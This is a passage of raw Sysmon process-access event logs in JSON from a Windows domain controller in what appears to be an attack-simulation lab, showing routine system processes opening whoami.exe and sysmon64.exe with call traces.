{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5980,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.776\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D9-5F25-0000-001058C20800}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.776","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D9-5F25-0000-001058C20800}","TargetProcessId":"4544","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5981,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.776\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.776","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5982,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.776\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.776","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5983,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.776\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.776","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5984,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.776\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.776","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5985,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.776\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.776","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5986,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.776\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.776","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5987,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.776\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.776","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5988,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.776\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 